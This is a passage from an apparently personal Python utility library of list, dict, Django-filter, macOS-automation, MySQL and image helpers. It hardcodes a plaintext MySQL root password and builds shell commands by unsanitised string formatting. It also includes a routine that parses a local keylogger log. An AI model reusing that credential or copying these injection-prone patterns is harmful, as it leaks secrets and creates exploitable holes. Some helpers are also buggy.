z = ifelseget(lambda:len(y) == 0,lambda:or_list(lambda:"Definition using Mirriam Webster. %s"%(re_substitute(random.choice(SOUPY(requests.get("https://www.merriam-webster.com/dictionary/%s"%(x)).text,"span","class","dtText")).text.split(": ")[1],["\s+"," "])),lambda:"No definition found for %s"%(x)),lambda:random.choice(y).definition())
return z
def dictjoin(*args,**kwargs):
x = {}
for i in args:
x.update(i)
return x
def dicttoxml(x):
import dicttoxml
def diff(x,y):
x_, y_ = x, y
x, y = lmap(lambda i:open(i).read().split("\n"),[x,y])
diffs = []
for i in x:
if i in y:
y.pop(y.index(i))
else:
diffs.append(i)
x, y = lmap(lambda i:open(i).read().split("\n"),[x_,y_])
for i in y:
if i in x:
x.pop(x.index(i))
else:
diffs.append(i)if(i not in diffs) else ()
print(len(diffs))
return diffs
def dip(x, y=1):
for i in range(y):
try:
x = sum(x,[])
except Exception as e:
x = x
return x
def dictxml(x,tcer=False):
if tcer == False:
import dicttoxml
y = dicttoxml.dicttoxml(x)
#y = y[0:39] + y[45:len(y)-7]
return y
else:
import xmltodict
y = xmltodict.parse(x)
return y
def dkey(x):
return list(x.items())[0][0]
"""
dkey({"a":"b"})
"""
def dl(x):
return Images().download(x)
def draw_circular_pay_chart():
length = 45
x = np.full(tuple(([length]*2)+[3]),[255,255,255])
coordinates = []
y = 0
for i in range(length):
coordinates.append((y,length-y-1))
y += 1
y = 0
for i in range(length):
coordinates.append((y,-(length-y)+1))
y += 1
y = 0
for i in range(length):
coordinates.append((-y,length-y-1))
y += 1
y = 0
for i in range(length):
coordinates.append((-y,-(length-y)+1))
y += 1
for i in coordinates:
x[i[0]][i[1]] = np.array([0,0,0])
def droll(x):
assert x() == True
def dt(x=0, strf='%Y-%m-%d'):
return (datetime.now() + timedelta(x)).strftime(strf)
def dune(*args):
x, y = args[0], args[1]
x = [y[idx](i) for idx,i in enum(x)]
return x
"""
dune("a, 2, 3".split(", "), [lambda i: i*2, lambda i:int(i)+2, lambda i:int(i)+5])
"""
def dvalue(x):
return list(x.items())[0][1]
"""
dvalue({"a":"b"})
"""
def emoji_viewer():
os.system("""osascript -e 'tell application "System Events" to key code 49 using {control down, command down}' """)
def enum(x):
return enumerate(x)
def eye_exam():
print("visit: https://www.personaleyes.com.au/online-eye-test/index.php")
print(" 1m away, 6 questions are asked ")
def extract_emojis(str):
import emoji
return ''.join(c for c in str if c in emoji.UNICODE_EMOJI)
def filter(objects, *args, **kwargs):
from django.db.models.query_utils import Q
objects = [AttrDict(i) if type(i)==dict else i for i in objects]
data = []
for i in objects:
to_append = 1
for attr, value in kwargs.items():
attr_arg = None
if "__" not in attr:
attr_arg = "equals"
elif "__" in attr and attr.split("__")[1] == "contains":
attr_arg = "contains"
elif "__" in attr and attr.split("__")[1] == "icontains":
attr_arg = "icontains"
elif "__" in attr and attr.split("__")[1] == "range":
attr_arg = "range"
attr=((attr)if("__" not in attr)else(attr.split("__")[0]))
if attr_arg == "equals" and not (getattr(i,attr) == value):
to_append = 0
if attr_arg == "contains" and not (value in getattr(i,attr)):
to_append = 0
if attr_arg == "icontains" and not (value.lower() in getattr(i,attr).lower()):
to_append = 0
if attr_arg == "range" and not (getattr(i,attr) >= value[0] and getattr(i,attr) <= value[1]):
to_append = 0
if(1==to_append):
data.append(i)
#data = []
#args = [~Q(x=5),~Q(y=5)]
#args = [~Q(x=5,y=5),]
#data = lmap(AD,[{"x":5,"y":5},{"x":5,"y":4},{"x":4,"y":5},{"x":4,"y":4}])
#new = []
#for i in data:
# to_append = True
# for j in args:
# for k, l in j.children:
# print(i, j, k, l)
# if getattr(i, k) == l:
# to_append = False
# print(getattr(i,k), l)
# if to_append == True:
# print(i)
# new.append(i)
#new = []
#for i in data:
# to_append = [True for i in range(len(args))]
# idx = 0
# for j in args:
# for k, l in j.children:
# print(i, j, k, l)
# if getattr(i, k) == l:
# to_append[idx] = False
# print(getattr(i,k), l)
# idx += 1
# if set(to_append) == {True}:
# print(i)
# new.append(i)
if args:
new = []
for i in data:
to_append = [True for i in range(len(args))]
idx = 0
for j in args:
all_signifiers = [True for i in range(len(j.children))]
idx_2 = 0
for k, l in j.children:
attr_arg = None
if "__" not in k:
attr_arg = "equals"
elif "__" in k and k.split("__")[1] == "contains":
attr_arg = "contains"
elif "__" in k and k.split("__")[1] == "icontains":
attr_arg = "icontains"
elif "__" in k and k.split("__")[1] == "range":
attr_arg = "range"
attr=((k)if("__" not in k)else(k.split("__")[0]))
value = l
if attr_arg == "equals" and (getattr(i,attr) == value):
all_signifiers[idx_2] = False
if attr_arg == "contains" and (value in getattr(i,attr)):
all_signifiers[idx_2] = False
if attr_arg == "icontains" and (value.lower() in getattr(i,attr).lower()):
all_signifiers[idx_2] = False
if attr_arg == "range" and (getattr(i,attr) >= value[0] and getattr(i,attr) <= value[1]):
all_signifiers[idx_2] = False
#if getattr(i, k) == l:
# #to_append[idx] = False
# all_signifiers[idx_2] = False
# print(getattr(i,k), l)
idx_2 += 1
if set(all_signifiers) == {False}:
to_append[idx] = False
idx += 1
if set(to_append) == {True}:
new.append(i)
data = new
return data
"""
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5),~Q(b=3)) == []
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5),~Q(b=2)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3},{"a":5,"b":5}],~Q(a=5)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3},{"a":5,"b":5}],~Q(a=5,b=5)) == [{'a': 5, 'b': 2}, {'a': 4, 'b': 3}]
"""
def filter_in(a, b, mode="show_not_there"):
assert len(oset(a)) == len(a)
assert len(oset(b)) == len(b)
if mode == "show_not_there":
x = []
for i in a:
if i in b:
x.append(i)
y = []
for i in b:
if i not in x:
y.append(i)
return y
elif mode == "show_there":
x = []
for i in a:
if i in b:
x.append(i)
return x
"""
filter_in([1,2,3],[1,2,3,4],"show_not_there")
filter_in([1,2,3],[1,2,3,4],"show_there")
filter_in([1,2,3,5],[1,2,3,4,5,6],"show_not_there")
"""
def findall(s, r, x=None):
return (re.findall(r, s))if(len(listminus(locals().values(),None))==2)else(re.findall(x, s)[0])if(len(listminus(locals().values(),[[]]))==3)else()
def flatten(x, y=1):
for i in range(y):
try:
x = sum(x,[])
except Exception as e:
x = x
return x
def floor(x):
import math; return math.floor(x)
def flt(x):
return float(x)
def font_preview(address):
from PIL import Image, ImageDraw, ImageFont
img = Image.new('RGB', (1800, 540), color = (255, 255, 255))
fnt = ImageFont.truetype(address, 45)
d = ImageDraw.Draw(img)
d.text((10,10), "[{}] Hello world. Untitled `404`.liquid ~`!@#$%^&*()_+-=[]\\|;':<>,.?/Seven Six Five Four".format(address.split("/")[-1]), font=fnt, fill=(0, 0, 0))
img.save('pil_text_font.png')
impreview('pil_text_font.png')
os.system('rm pil_text_font.png')
def free_plus_ship(x):
CH().free_plus_ship(x)
def generate_keylogger():
times, keys = [], []
file = open(homepath("~/hole/hole/keylogger/logfile.log")).read().split("\n")[:-1]
file = sudby(lambda i: i.split(" ",1)[1][0] != "[", file)
for i in file:
time, key = i.split(" ",1)
times.append(time)
keys.append(key)
time, letters, current_load, on = None, "", "", False
current_loads = []
for i, j in zip(times,keys):
letters = letters + j
time = i
if letters.endswith("ss-"):
on = True
if on == True:
current_load = current_load + j
if letters.endswith("-ee"):
on = False
time = i
current_load = current_load[2:-3]
print(current_load)
current_loads.append([time, current_load])
time = datetime.fromtimestamp(int(time))
tp(lambda:Save(Note,note=current_load,time=time))
letters = ""
current_load = ""
# if os.path.getsize(homepath("~/hole/hole/keylogger/logfile.log")) > 7432790:
# x = open(homepath("~/hole/hole/keylogger/logfile.log"),"r").readlines()
# num_lines = int(len(x)/2)
# y = x[:num_lines]
# open(homepath("~/hole/hole/keylogger/logfile.log"),"w").write("".join(y))
time.sleep(60)
ifdo(lambda:random.randrange(1,61) == 60,lambda:os.system("killall keylogger"))
generate_keylogger()
# return current_loads
def generate_one_alphabetical_string(size=10):
import string
w = (" ".join(string.ascii_letters)).split(" ")
x = ""
for i in range(size):
x += random.sample(w,1)[0]
return x
def generate_one_alphanumeric_string(size=10):
import string
w = (" ".join(string.ascii_letters)).split(" ") + list(map(str,list(range(10))))
x = ""
for i in range(size):
x += random.sample(w,1)[0]
return x
def generate_one_random_number(digits):
x = ""
while True:
x = x + str(random.choice(list(range(10))))
if len(x) == digits:
return x
def generator(x):
return (i for i in x)
def getattrs(attrs,x):
return [getattr(x,i) for i in attrs]
def getitems(items,x):
return [getitem(x,i) for i in items]
def getpass(x = None):
from getpass import getpass
return getpass()if(x==None)else(getpass(x))
def getsafarisource():
blueprint("Safari -> Advanced -> Show develop menu ; Develop -> Allow JavaScript from Apple Events")
x = subprocess.check_output("""osascript -e 'tell application "Safari" to set my_html to source of document 1'""",shell=True).decode("utf-8",errors="backslashreplace")
return x
def getsafariurl():
x = subprocess.getoutput("""osascript -e 'tell application "Safari" to set the_url to URL of current tab of window 1'""")
return x
def getuser():
import getpass
return getpass.getuser()
def getwindowcount(x):
return int(subprocess.getoutput("""osascript -e 'tell application "%s" to get (count of windows)'"""%x))
def get_active_shops():
return Filter(Shop,Active=True)
def get_chmod_statuses():
for i in os.listdir("/Applications"):
status = subprocess.getoutput("stat -f '%OLp' '/Applications/{}'".format(i))
print("%s: %s" % (i,status))
for i in os.listdir("/Applications/Utilities"):
status = subprocess.getoutput("stat -f '%OLp' '/Applications/Utilities/{}'".format(i))
print("%s: %s" % (i,status))
def get_dircount(path=None):
if path is None: path = os.path.expanduser('~/')+'Downloads'
return len(os.listdir(path))
def get_feed():
return get_user().remote_read(fields=["feed"]).export_all_data()["feed"]["data"]
def get_in_between_idx(new,x):
chosen_idx = None
for idx,i in enum(x[:-1]):
if new > i and new < x[idx+1]:
print(i,new,x[idx+1])
chosen_idx = idx
return chosen_idx
def get_one_address(directory,ext):
return os.path.join(directory,"x")+(".%s"%(ext))
def get_random_address(directory):
print("getting random address")
class x(str):
__init__ = lambda self, s: super().__init__()
png = lambda self: self.__add__(".png")
jpg = lambda self: self.__add__(".jpg")
jpeg = lambda self: self.__add__(".jpeg")
csv = lambda self: self.__add__(".csv")
mp4 = lambda self: self.__add__(".mp4")
txt = lambda self: self.__add__(".txt")
txt = lambda self: self.__add__(".txt")
txt = lambda self: self.__add__(".txt")
txt = lambda self: self.__add__(".txt")
c = x(generate_one_random_number(10))
if c in lmap(lambda i: ".".join(i.split(".")[:-1]), os.listdir(directory)):
return get_random_address(directory)
c = x(os.path.join(directory,c))
return c
def get_random_address2(directory,ext):
x = random.randrange(10000000)
return os.path.join(directory,str(x))+".%s"%(ext)
def get_random_from_lists(*args):
firsts = args[:int(len(args)/2)]
x = []
x.append(firsts[0])
for idx,i in enum(firsts[1:]):
x.append(round(i+x[-1],2))
new = random.random()
x.insert(0,0)
"""
while True:
new = random.random()
for idx,i in enum(x[:-1]):
if new > i and new < x[idx+1]:
print(i,new,x[idx+1])
time.sleep(1)
"""
choices = args[int(len(args)/2):]
chosen_idx = get_in_between_idx(new,x)
chosen_choices = choices[chosen_idx]
return random.choice(chosen_choices)
def get_random_word():
from nltk.corpus import words
x = words.words()
word = random.choice(x)
return word
def get_lambda_name(l):
return get_source(l).split("=")[0].strip()
def get_latest_download(path=None,x=0):
import glob
if path is None: path = os.path.expanduser('~/')+'Downloads'
return sorted(glob.glob('%s/*' % path), key=os.path.getmtime, reverse=True)[x]
def get_product_url(x):
url = "https://%s/admin/products/%s"%(Get(Shop,shop_abbreviation="rom").Domain_Name,x.id)
return url
def get_size_of(x):
return sys.getsizeof(x)
def get_source(x):
from inspect import getsource
return getsource(x)
def getitem(*args):
return or_list(lambda:args[0].get(args[1],or_list(lambda:args[2],None)),lambda:or_list(lambda:args[0][args[1]],lambda:args[2]),lambda:(0/0))
def gl(x,a):
globals()[a] = x
"""
gl("5","test")
print(gx("test"))
"""
def gleb(x,y=1):
return (random.sample(x,1)[0])if(y==1)else(random.sample(x,y))
def globalise(x,a):
globals()[a] = x
def globe(x,*args):
return (globals().get(x,*args))if(args)else(globals().get(x))
def go_over(x,y):
x(y)
return y
"""
go_over(lambda i: print(i.a), AD(a=5))
"""
def got_ali_url():
existing = lmap(lambda i: re.findall("\d+\.html",i.ali_url)[0],Filter(Product,ali_url__icontains="aliexpress.com"))
urls_2 = lmap(lambda i: re.findall("\d+.html",i.url)[0],All(AddProduct))
now = re.findall("\d+\.html",get_first_chrome_url())[0]
if now in existing or now in urls_2:
print("index: %s"%(shuffled(existing+urls_2).index(now)))
print("now: %s" % now)
return True
def gx(x,*args):
return (globals().get(x,*args))if(args)else(globals().get(x))
def homepath(x):
import os
return os.path.expanduser("~%s"%(x.split("~")[1]))
def html_test(x):
open("test.html","w").write(str(x))
system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -p sele test.html &>/dev/null&")
def html_to_png(io):
address_1 = homepath("~/tavern/tavern/soda/dls/._%s_tmp.html"%(random.randrange(10000000,99999999)))
address_2 = homepath("~/tavern/tavern/soda/dls/._%s_out.png"%(random.randrange(10000000,99999999)))
try:
if os.path.exists(io):
io = io
else:
try:
try:open(address_1,"w",encoding="utf-8").write(io)
except:open(address_1,"wb",encoding="utf-8").write(io)
except Exception as v:
v
io = address_1
try:
os.system("""/usr/local/bin/wkhtmltoimage --disable-smart-width --javascript-delay 1000 --encoding utf-8 --load-error-handling ignore --load-media-error-handling ignore "%s" "%s" """%(address_1,address_2))
except Exception as w:
w
tryprocess(os.remove,address_1)
return address_2
except Exception as e:
e = str(e)
OSA.log("MIGHTY_ERROR: %s"%e)
return "MIGHTY ERROR"
def ifdo(x,y):
if x():
y()
"""
ifdo(lambda: 1==1, lambda: print(5))
ifdo(lambda: 1==2, lambda: print(5))
ifdo(lambda: [], lambda: print(5))
ifdo(lambda: True, lambda: print(5))
"""
def ifelseget(x,y,z):
if tryreturn(lambda:x()):
return y()
else:
return z()
"""
ifelseget(lambda: 1==1, lambda: print(5), lambda: print(4))
ifelseget(lambda: 1==2, lambda: print(5), lambda: print(4))
ifelseget(lambda: [], lambda: print(5), lambda: print(4))
ifelseget(lambda: True, lambda: print(5), lambda: print(4))
"""
def ifelselist(*args):
for i,j in zip(args[0::2],args[1::2]):
if i():
return j()
def ifget(x,y):
if tryreturn(lambda:x()):
return y()
def im2arr(fn):
import numpy as np
from PIL import Image
return np.array(Image.open(fn))
def images_to_column_xlsx(images,column="A",image_size=100,**stars):
import openpyxl
wb = ifelseget(lambda:stars["wb"],lambda:stars["wb"],lambda:openpyxl.Workbook())
ws = wb.worksheets[0]
ws.column_dimensions['A'].width = (image_size/8)
s = 1
for i in images:
img = openpyxl.drawing.image.Image(i)
img.anchor = '%s%s'%(column,s)
print('%s%s'%(column,s))
ws.add_image(img)
ws.row_dimensions[s].height = (image_size*0.75)
s += 1
wb.save('out.xlsx')
return wb
def impreview(address, speed=0.3):
if not os.path.exists(str(address)):
import cv2
os.makedirs(homepath("~/tavern/tavern/soda/dls"),exist_ok=True)
a = (homepath("~/tavern/tavern/soda/dls/%s.png"%(generate_one_alphanumeric_string(18))))
cv2.imwrite(a, address)
address = a
from PIL import Image
if os.path.isdir(address):
[[Image.open(os.path.join(address,fn)).show(), time.sleep(speed)] for fn in sorted(os.listdir(address))]
else:
Image.open(address).show()
def index(x, y):
try:return list(x).index(y)
except:return -1
def indicepick(x,y):
return [y[i] for i in x]
"""
indicepick([1,2,3], [1,2,3,4,5,6])
"""
def intcls(x,**kwargs):
return type("a",(int,),kwargs)(x)
"""
r = intcls(123,print = lambda self:print(self))
r.print()
"""
def intify(x):
return [int(i) if tp(lambda:int(i))==1 else i for i in x]
def itemcopy(a,b,f):
redprint("Temporary Guide For Cloning: Keyse, GeheadN+(A),(B),(F);A^!TAKES FROM B, ITER<F>.")
for zelish in f:
rhondousel = getattr(b, zelish, None)
setattr(a, zelish, rhondousel)
a.save()
return a
""" ::: Tests ::: """
"""
a = AttrDict()
b = All(Product)[0]
fields = ['size_chart', 'vendor', 'id', 'item_type']
itemcopy(a,f,fields)
"""
def iterindex(xy, lox):
x = []
for i in xy:
if i in lox:
x.append(lox.index(i))
return x
"""
xy = [0,1,2,3,4,5,6]
lox = [0,1,2,3,4,5,6,7,8,0,1,2,3]
print(iterindex(xy, lox))
xy = [0,1,2,3,4,5,6]
lox = [7]
print(iterindex(xy, lox))
"""
def key(dictlist, key):
if type(dictlist) is str or type(dictlist) is int:
dictlist, key = key, dictlist
try: return [getattr(i, key) for i in list(dictlist)]
except: return [i[key] for i in list(dictlist)]
def keyby(x,y):
return or_list(lambda:[i for i in y if x(i)],lambda:[i for i in y if x(*i)],[])
def keycall(key, dictlist, *args, **kwargs):
try: return [getattr(i, key)(*args, **kwargs) for i in list(dictlist)]
except: return [i[key](*args, **kwargs) for i in list(dictlist)]
def keycontains(key, contains, dictlist):
try: return [i for i in list(data) if contains in i[key]]
except: return [i for i in list(data) if contains in getattr(i, key)]
def keyequals(key, equals, data):
try: return [i for i in list(data) if i[key] == equals]
except: return [i for i in list(data) if getattr(i, key) == equals]
def keyicontains(key, icontains, dictlist):
try: return [i for i in list(data) if icontains.lower() in i[key].lower()]
except: return [i for i in list(data) if icontains.lower() in getattr(i, key).lower()]
def keymulti(keys, dictlist):
try: return [[getattr(a,b) for b in keys] for a in list(dictlist)]
except: return [[getitem(a,b) for b in keys] for a in list(dictlist)]
def keynicontains(key, nicontains, data, ):
try: return [i for i in list(data) if nicontains.lower() not in i[key].lower()]
except: return [i for i in list(data) if nicontains.lower() not in getattr(i, key).lower()]
def keyncontains(key, ncontains, data, ):
try: return [i for i in list(data) if ncontains not in i[key]]
except: return [i for i in list(data) if ncontains not in getattr(i, key)]
def keynequals(key, nequals, data, ):
try: return [i for i in list(data) if i[key] != nequals]
except: return [i for i in list(data) if getattr(i, key) != nequals]
def keynotequals(key, notequals, data, ):
try: return [i for i in list(data) if i[key] != notequals]
except: return [i for i in list(data) if getattr(i, key) != notequals]
def keysort(key, dictlist, tcer=True):
import operator
if type(key) is not list:
key = [key]
try: return sorted(list(dictlist), key=operator.itemgetter(*key), reverse=tcer)
except: return sorted(list(dictlist), key=operator.attrgetter(*key), reverse=tcer)
def keysort_multi(columns, items, tcer=False):
from operator import itemgetter, attrgetter
from functools import cmp_to_key
comparers = None
if tryprocess(lambda:items[0].get(columns[0])): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]
else: comparers = [((attrgetter(col[1:].strip()), -1) if col.startswith('-') else (attrgetter(col.strip()), 1)) for col in columns]
def comparer(left, right):
def cmp(a, b):
if a == None and b == None: return 0
if a == None and b != None: return 1
if a != None and b == None: return -1
elif a != None and b != None: return (a > b) - (a < b)
comparer_iter = ( cmp(fn(left), fn(right)) * mult for fn, mult in comparers)
return next((result for result in comparer_iter if result), 0)
return sorted(list(items), key=cmp_to_key(comparer), reverse=tcer)
def kodo(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
(0/0)
def ldict(x=None):
return OrderedDict(x)if(x)else(OrderedDict())
def linspace(start, stop, precision, endpoint=False):
start, stop = round(float(start),2), round(float(stop),2)
roundpoint = len(str(precision).split(".")[-1])if(".") in str(precision) else 0
d = []
x = start
while True:
d.append(x)
x = x + precision
x = round(x, roundpoint)
if x == stop:
break
if endpoint == True:
d.append(x)
return d
"""
linspace(0.76, 1.01, 0.01)
"""
def list_and(*args):
from types import MethodType,ModuleType,FunctionType
latest = None
for idx, arg in enum(args):
if type(arg) == FunctionType or type(arg) == MethodType: arg = tryreturn(lambda:arg())
else: arg = args[idx]
latest = arg
if arg == False or arg == 0 or arg == None or arg == [] or arg == () or arg == "" or arg == b"": return latest
return latest
def listadd(*args):
x = []
for i in args:
if "append" not in dir(i):
i = [i]
x.extend(i)
return x
"""
listadd([1,2,3],[1,2,3],["a","b","c"],[[1,2,3]])
"""
def listinsert(x,l1,l2):
return l2[:x] + l1 + l2[x:]
"""
assert listinsert(1,[4,5,6],[1,2,3]) == [1,4,5,6,2,3,]
"""
def listmap(func, *args, **kwargs):
from functools import partial
return list(map( partial(func, **kwargs), *args ))
def listminus(x,y=[],minus_once = False, **kwargs):
# puts [] into a list.
if "append" not in dir(y):
y = [y]
if minus_once == False:
return [i for i in x if i not in y and kwargs.get("method",lambda i:True)(i)]
else:
for i in y:
if i not in x:
continue
else:
R = x.index(i)
x.pop(R)
return x
"""
x = [2,1,2,1]
y = [1]
assert [2, 2] == listminus(x, y, minus_once = False)
assert [2, 2, 1] == listminus(x, y, minus_once = True)
"""
def listplus(x,y,z):
l = len(x)
for i in range(y-l):
x.append(z)
return x
'''
listplus([1,2,3],5,None)
'''
def listreplace(io, *args, **kwargs):
return [setitem(kwargs,"z",io),[setitem(kwargs,"z",[i if i != x else j for i in kwargs["z"]]) for x,j in zip(args[0::2],args[1::2])] ,kwargs["z"]][-1]
def listshift(start=None,x=None):
a = x[start]
x.__delitem__(start)
x = [a] + x
return x
"""
listshift(2,[1,2,3,4,5])
"""
def lmap(func, *args, **kwargs):
from functools import partial
arg_lens = oset([len(i) for i in args])
assert len(arg_lens) == 1
if arg_lens[0] == 0:
return []
# x = or_list(lambda:list(map( partial(func, **kwargs), *args )),
# lambda:list(map( partial(func, **kwargs), *[[i[idx] for i in args[0]] for idx in list(range(oset(list(map(len,args[0])))[0]))]) ),
# lambda: 0/0)
x = or_list(lambda:list(map( partial(func, **kwargs), *args )),
lambda:list(map( partial(func, **kwargs), *transpose(args[0]) )),
lambda:0/0)
ifdo(lambda:x==0,lambda:exec("assert False"))
return x
"""
assert lmap(lambda i,j: i+j, [(1,1),(2,2),(3,3)]) == [2, 4, 6]
assert lmap(lambda i: i+1, [1,2]) == [2, 3]
"""
def lrange(*args):
return list(range(args[0]))if(len(args)==1)else(list(range(args[0],args[1])))
def lset(x):
return list(set(x))
def loadpickles(*args,**kws):
ifdo(lambda:os.path.exists(args[0])==False,lambda:savepickles(kws['default'],args[0]) )
return pickle.load(open(args[0],'rb'))
def login_prompt():
OSA().log("Please log in. Then press OK. ʕ•́ᴥ•̀ʔ",tp=False)
def lsorted(x,**kwargs):
return sorted(x,key=kwargs.get("key",None),reverse=kwargs.get("tcer",False))
"""
lsorted([5,2,3],tcer=True)
lsorted([5,2,3],y=lambda i: i)
lsorted([5,2,3],y=lambda i: i,tcer=True)
"""
def make_archive(address):
import shutil
import zipfile
rm("%s.zip"%address)if(1==os.path.exists("%s.zip"%address))else(0)
shutil.make_archive(address, 'zip', address) if os.path.isdir(address) else zipfile.ZipFile("%s.zip"%address, mode="w").write(address)
return "%s.zip"%address
def methodsort(x, method, tcer=False):
return sorted(x, key=method, reverse=tcer)
def microsecondize(a,b):
c = (b-a)
d = c.seconds
v = c.microseconds / 1000000
f = (d)+(v)
return f
def mig(*args,**kwargs):
SQL().migrate(*args,**kwargs)
def mkchdir(address):
os.makedirs(address, exist_ok=True)
os.chdir(address)
def msort(x, method, tcer=False):
return sorted(x, key=method, reverse=tcer)
def multi_input(printout):
distinct_print("====multi_input====:\n%s"%printout)
x = ""
while True:
y = input("")
if y[-2:] == "\Q":
y = y[:-2]
if y=="q":
return x
x += y
x += "\n"
def multiprocessing_process(target):
import multiprocessing
R = multiprocessing.Process(target = target)
R.start()
return R
def mysql_args_and_kwargs_to_string(*args, **kwargs):
import django
stuff = []
for i in args:
if type(i) == django.db.models.query_utils.Q:
x = i.children
for idx_0, a in enum(x):
x[idx_0] = list(a)
for idx,b in enum(x[idx_0]):
if b == True:
x[idx_0][idx] = "true"
elif b == False:
x[idx_0][idx] = "false"
for j in x:
if "__" in j[0]:
if "__icontains" in j[0]:
stuff.append("%s not like '%%%s%%'"%(j[0].split("__")[0],j[0].split("__")[1]))
else:
stuff.append("%s!='%s'"%(j[0],j[1]))
for a,b in kwargs.items():
if a == True: a = "true"
if a == False: a = "false"
if "__" in a:
if "__icontains" in a:
stuff.append("%s like '%%%s%%'"%(a.split("__")[0],b))
else:
stuff.append("%s='%s'"%(a,b))
stuff = "where" + " " + " and ".join(stuff)
return stuff
def mysql_delete(x):
""" This will work only if the id is an AutoField on any model with multiple unique fields. """
#t = ('/usr/local/bin/mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e """delete from %s_%s where id="%s";"""&>/dev/null ' % (Database, x._meta.verbose_name.replace(" ",""), x.id))
t = ("""/usr/local/bin/mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e "delete from %s_%s where id='%s';"&>/dev/null """ % (Database, x._meta.verbose_name.replace(" ",""), x.id))
#redprint(t)
os.system(t)
def mysql_exec(w="select count(*) from soda_timedtask;"):
x = subprocess.getoutput("""mysql -u root --password=w24uyLMGU2TWdkBdUKMWySQiAcfdjB1A soda -e "%s" """ % ((w+";")if(not w.endswith(";"))else(w))).split("\n")[1:]
x = [i.split("\t") for i in x]
headers = x.pop(0)
y = [dict(zip(headers, i)) for i in x]
return y
def ner_tagger(text):
from nltk.tag import StanfordNERTagger
from nltk.tokenize import word_tokenize
Binarydata().export("NER")
st = StanfordNERTagger('NER/english.all.3class.distsim.crf.ser.gz',
'NER/stanford-ner.jar',
encoding='utf-8')
tokenized_text = word_tokenize(text)
classified_text = st.tag(tokenized_text)
print(classified_text)
x = []
for i in classified_text:
if i[1]=='PERSON':
print(i)
x.append(i[0])
import shutil
shutil.rmtree("NER")
return x
def new_dict(x,fields=[]):
return AD({a:b for a,b in x.items() if a in fields})
def notentry(a,b):
if b not in globals():
globalise(a(),b)
return globals()[b]
"""
notentry(lambda:1,"b")
assert globe("b") == 1
"""
def notexists(x):
if x != False and x != 0 and x != None and x != [] and x != () and x != "" and x != b"":
return False
else:
return True
"""
notexists("")
"""
def nps_chat_reader():
from nltk.corpus import nps_chat
for i in nps_chat.xml_posts():
print(i.text)
x = input("")
if x == "quit":
break
return
def openr(address):
return open(address)
def openw(address):
return open(address, "w")
def openrb(address):
return open(address, "rb")
def openwb(address):
return open(address, "wb")
def ordered_json_dumps(x):
return json.dumps(OrderedDict([[a,str(x[a])] for a in list(sorted(x.keys())) if not a.startswith("_")]), indent=4)
def or_list(*args):
from types import MethodType,ModuleType,FunctionType
for idx, arg in enum(args):
if type(arg) == FunctionType or type(arg) == MethodType:
arg = tryreturn(lambda:arg())
if arg != False and arg != 0 and arg != None and arg != [] and arg != () and arg != "" and arg != b"":
return arg
if arg != False and arg != 0 and arg != None and arg != [] and arg != () and arg != "" and arg != b"":
return args[idx]
return (tryreturn(lambda:args[-1]()))if(type(args[-1])==FunctionType or type(args[-1])==MethodType)else(args[-1])
"""
or_list(tryreturn(lambda: 3/1), "a", None, 0,)
or_list(1,lambda:print(1),lambda:print(1))
or_list(lambda:print(1),1,lambda:print(1))
or_list(lambda:print(1),1)
or_list(0,ExecutableText().export("hello"),1)
or_list(0,lambda x=1: x)
"""
def oset(x, **kwargs):
y = []
for i in x:
if i not in y:
if i not in kwargs.get("minus",[]):
if kwargs.get("method",lambda i: True)(i) == True:
y.append(i)
return y
"""
assert oset([3,2,3,3,2]) == [3, 2]
assert oset([1,2,1,]) == [1,2]
assert oset([1,2,1,],method=lambda i: i!=1) == [2]
assert oset([1,2,1,],method=lambda i: i!=1,minus=[2]) == []
assert oset([1,2,1,],method=lambda i: i!=1,minus=[3]) == [2]
"""
def overlay_sound_files(sound_files):
from pydub import AudioSegment
sound_file = AudioSegment.from_file(sound_files[0])
for i in sound_files[1:]:
new_sound_file = AudioSegment.from_file(i)
sound_file = sound_file.overlay(new_sound_file)
sound_file.export(os.path.expanduser("~/Downloads/export.wav"), format='wav')
return os.path.expanduser("~/Downloads/export.wav")
def pathjoin(*args):
return os.path.join(*args)
def plusUpdate(x, **kwargs):
return [[setattr(x,a,getattr(x,a)+b) for a,b in kwargs.items()],x.save(),x][2]
def poll(o, x, step=8, poll_forever=True):
import polling
polling.poll(o, step=step, poll_forever=poll_forever)
x()
poll(o, x, step=step, poll_forever=poll_forever)
def pool(f, *args, nodes=12, **kwargs):
# [ERRORFUL] if you do pool(ss.assert_connection_speed, "20MB"), it should have minimum_speed = , otherwise you're saying that "20MB" is the list which you should be pooling.
results = type("list", (list,), dict(result=lambda self: [keycall("join",self),keycall("result",self)][1]))
results = results()
if args and len(args[0]) == 0: return results
#@results() returns "processing" list. does not fine.
#@unless i make results keycall join.
#results = []
from inspect import getfullargspec
fullargspec = getfullargspec(f)
"""
defaults_len = tryreturn(len, fullargspec.defaults)
accountable_args = listminus(fullargspec.args, (["self"] + list(kwargs)), minus_once = True)
accountable_args_len = len(accountable_args) - defaults_len
if accountable_args_len == 0:
accountable_args_len = accountable_args_len - len(args)
"""
argcount = f.__code__.co_argcount
if "self" in fullargspec.args:
argcount = argcount - 1
accountable_args_len = argcount - (len(kwargs))
# [TESTING] magentaprint(accountable_args_len)
zilleum = 0
while True:
if keycall("result",results).count("processing") < nodes:
if accountable_args_len != 0:
#@ruined the args from before calling pool. results.append(process(f,*[a.pop(0) for a in args], **kwargs))
results.append(process(f,*[a[zilleum] for a in args], **kwargs))
zilleum+=1
elif accountable_args_len == 0:
results.append(process(f, **kwargs))
#def hi():
#@works. hi(**{})
else:
time.sleep(0.1)
#if len(args[0]) == 0:
if not args:
r = results[0]
r.join_saved = r.join
r.result_saved = r.result
def result(self):
self.join()
return self.result_saved()
is_running = lambda self: self.isAlive()
bind3(r, result)
bind3(r, is_running)
return r
